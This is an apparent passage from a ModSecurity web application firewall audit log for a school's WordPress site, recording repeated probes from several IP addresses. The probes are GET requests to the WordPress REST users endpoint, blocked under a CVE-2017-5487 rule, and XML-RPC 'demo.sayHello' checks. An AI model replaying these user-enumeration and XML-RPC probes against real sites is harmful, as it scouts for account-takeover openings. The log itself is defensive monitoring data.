"3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459070747717 2764 (- - -) Stopwatch2: 1746459070747717 2764; combined=1251, p1=403, p2=819, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --44346122-Z-- --85f5dc15-A-- [05/May/2025:22:31:14 +0700] aBjZwoZWvR7-42f6JrAGkAAAAMk 103.236.140.4 52678 103.236.140.4 8181 --85f5dc15-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.173.248 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.173.248 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --85f5dc15-C-- demo.sayHello --85f5dc15-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --85f5dc15-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459074034542 5408 (- - -) Stopwatch2: 1746459074034542 5408; combined=4223, p1=494, p2=3502, p3=32, p4=35, p5=94, sr=72, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --85f5dc15-Z-- --b3961a12-A-- [05/May/2025:22:32:01 +0700] aBjZ8YZWvR7-42f6JrAGqgAAAMo 103.236.140.4 53062 103.236.140.4 8181 --b3961a12-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.118.182 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.118.182 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b3961a12-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b3961a12-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459121415828 2972 (- - -) Stopwatch2: 1746459121415828 2972; combined=1237, p1=420, p2=788, p3=0, p4=0, p5=29, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b3961a12-Z-- --b4f30337-A-- [05/May/2025:22:32:04 +0700] aBjZ9IZWvR7-42f6JrAGswAAAMs 103.236.140.4 53094 103.236.140.4 8181 --b4f30337-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.118.182 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.118.182 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b4f30337-C-- demo.sayHello --b4f30337-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b4f30337-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459124207941 6190 (- - -) Stopwatch2: 1746459124207941 6190; combined=4821, p1=633, p2=3939, p3=40, p4=43, p5=99, sr=81, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b4f30337-Z-- --e2077151-A-- [05/May/2025:22:33:07 +0700] aBjaMwRwKNFSM6B7_LabFAAAAIA 103.236.140.4 53626 103.236.140.4 8181 --e2077151-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.40.142 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.40.142 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e2077151-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e2077151-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459187124313 2554 (- - -) Stopwatch2: 1746459187124313 2554; combined=1408, p1=449, p2=916, p3=0, p4=0, p5=43, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e2077151-Z-- --a7424e73-A-- [05/May/2025:22:33:09 +0700] aBjaNU2V_h1VFAgsfgZ3AQAAAAE 103.236.140.4 53646 103.236.140.4 8181 --a7424e73-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.40.142 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.40.142 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a7424e73-C-- demo.sayHello --a7424e73-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a7424e73-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459189854055 5112 (- - -) Stopwatch2: 1746459189854055 5112; combined=4083, p1=525, p2=3340, p3=31, p4=36, p5=89, sr=73, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a7424e73-Z-- --b0fcd016-A-- [05/May/2025:22:33:55 +0700] aBjaYwRwKNFSM6B7_LabOAAAAIM 103.236.140.4 54066 103.236.140.4 8181 --b0fcd016-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.165.139 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.165.139 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b0fcd016-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b0fcd016-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459235476508 2839 (- - -) Stopwatch2: 1746459235476508 2839; combined=1347, p1=435, p2=883, p3=0, p4=0, p5=29, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b0fcd016-Z-- --f6299a47-A-- [05/May/2025:22:33:58 +0700] aBjaZoZWvR7-42f6JrAG8AAAANU 103.236.140.4 54098 103.236.140.4 8181 --f6299a47-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.165.139 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.165.139 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f6299a47-C-- demo.sayHello --f6299a47-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f6299a47-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459238728933 6647 (- - -) Stopwatch2: 1746459238728933 6647; combined=4805, p1=664, p2=3855, p3=38, p4=42, p5=118, sr=129, sw=88, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f6299a47-Z-- --9bd6b515-A-- [05/May/2025:22:34:16 +0700] aBjaeARwKNFSM6B7_LabRwAAAIA 103.236.140.4 54238 103.236.140.4 8181 --9bd6b515-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.166.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.166.163 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9bd6b515-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9bd6b515-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459256599149 2239 (- - -) Stopwatch2: 1746459256599149 2239; combined=1228, p1=407, p2=791, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9bd6b515-Z-- --4fd21667-A-- [05/May/2025:22:34:17 +0700] aBjaeYZWvR7-42f6JrAG-AAAAMY 103.236.140.4 54252 103.236.140.4 8181 --4fd21667-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.202.77.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.77.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4fd21667-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4fd21667-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459257848700 2912 (- - -) Stopwatch2: 1746459257848700 2912; combined=1241, p1=402, p2=810, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4fd21667-Z-- --d7e87b7d-A-- [05/May/2025:22:34:19 +0700] aBjaewRwKNFSM6B7_LabSAAAAJU 103.236.140.4 54266 103.236.140.4 8181 --d7e87b7d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.166.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.166.163 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d7e87b7d-C-- demo.sayHello --d7e87b7d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d7e87b7d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459259388949 5200 (- - -) Stopwatch2: 1746459259388949 5200; combined=3902, p1=505, p2=3182, p3=29, p4=30, p5=92, sr=84, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d7e87b7d-Z-- --38ce9724-A-- [05/May/2025:22:34:20 +0700] aBjafARwKNFSM6B7_LabSgAAAIo 103.236.140.4 54272 103.236.140.4 8181 --38ce9724-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.202.77.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.77.215 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --38ce9724-C-- demo.sayHello --38ce9724-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --38ce9724-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459260664176 5438 (- - -) Stopwatch2: 1746459260664176 5438; combined=4081, p1=566, p2=3286, p3=26, p4=27, p5=101, sr=121, sw=75, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --38ce9724-Z-- --57fd112c-A-- [05/May/2025:22:35:22 +0700] aBjaugRwKNFSM6B7_LabcAAAAJg 103.236.140.4 54784 103.236.140.4 8181 --57fd112c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.91.171.18 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.91.171.18 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --57fd112c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --57fd112c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459322068082 2258 (- - -) Stopwatch2: 1746459322068082 2258; combined=1265, p1=413, p2=823, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --57fd112c-Z-- --14e2254a-A-- [05/May/2025:22:35:24 +0700] aBjavE2V_h1VFAgsfgZ3RgAAAAs 103.236.140.4 54808 103.236.140.4 8181 --14e2254a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.91.171.18 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.91.171.18 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --14e2254a-C-- demo.sayHello --14e2254a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --14e2254a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459324862839 6918 (- - -) Stopwatch2: 1746459324862839 6918; combined=4978, p1=676, p2=4044, p3=39, p4=52, p5=99, sr=153, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --14e2254a-Z-- --c1fe652d-A-- [05/May/2025:22:35:40 +0700] aBjazIZWvR7-42f6JrAHIwAAAMg 103.236.140.4 54924 103.236.140.4 8181 --c1fe652d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.58.180 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.58.180 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c1fe652d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c1fe652d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459340420766 3088 (- - -) Stopwatch2: 1746459340420766 3088; combined=1509, p1=537, p2=941, p3=0, p4=0, p5=31, sr=124, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c1fe652d-Z-- --24b9f27a-A-- [05/May/2025:22:35:41 +0700] aBjazYZWvR7-42f6JrAHJQAAANQ 103.236.140.4 54934 103.236.140.4 8181 --24b9f27a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.170.28 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.170.28 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --24b9f27a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --24b9f27a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459341466711 2746 (- - -) Stopwatch2: 1746459341466711 2746; combined=1222, p1=418, p2=774, p3=0, p4=0, p5=30, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --24b9f27a-Z-- --59965a5a-A-- [05/May/2025:22:35:43 +0700] aBjazwRwKNFSM6B7_LabdQAAAJc 103.236.140.4 54956 103.236.140.4 8181 --59965a5a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.58.180 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.58.180 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --59965a5a-C-- demo.sayHello --59965a5a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --59965a5a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459343152186 4789 (- - -) Stopwatch2: 1746459343152186 4789; combined=3787, p1=476, p2=3107, p3=22, p4=23, p5=92, sr=67, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --59965a5a-Z-- --3f51dd1e-A-- [05/May/2025:22:35:44 +0700] aBja0ARwKNFSM6B7_LabdgAAAIQ 103.236.140.4 54974 103.236.140.4 8181 --3f51dd1e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.170.28 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.170.28 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3f51dd1e-C-- demo.sayHello --3f51dd1e-F-- HTTP/1.1 301 Moved Permanently Location: 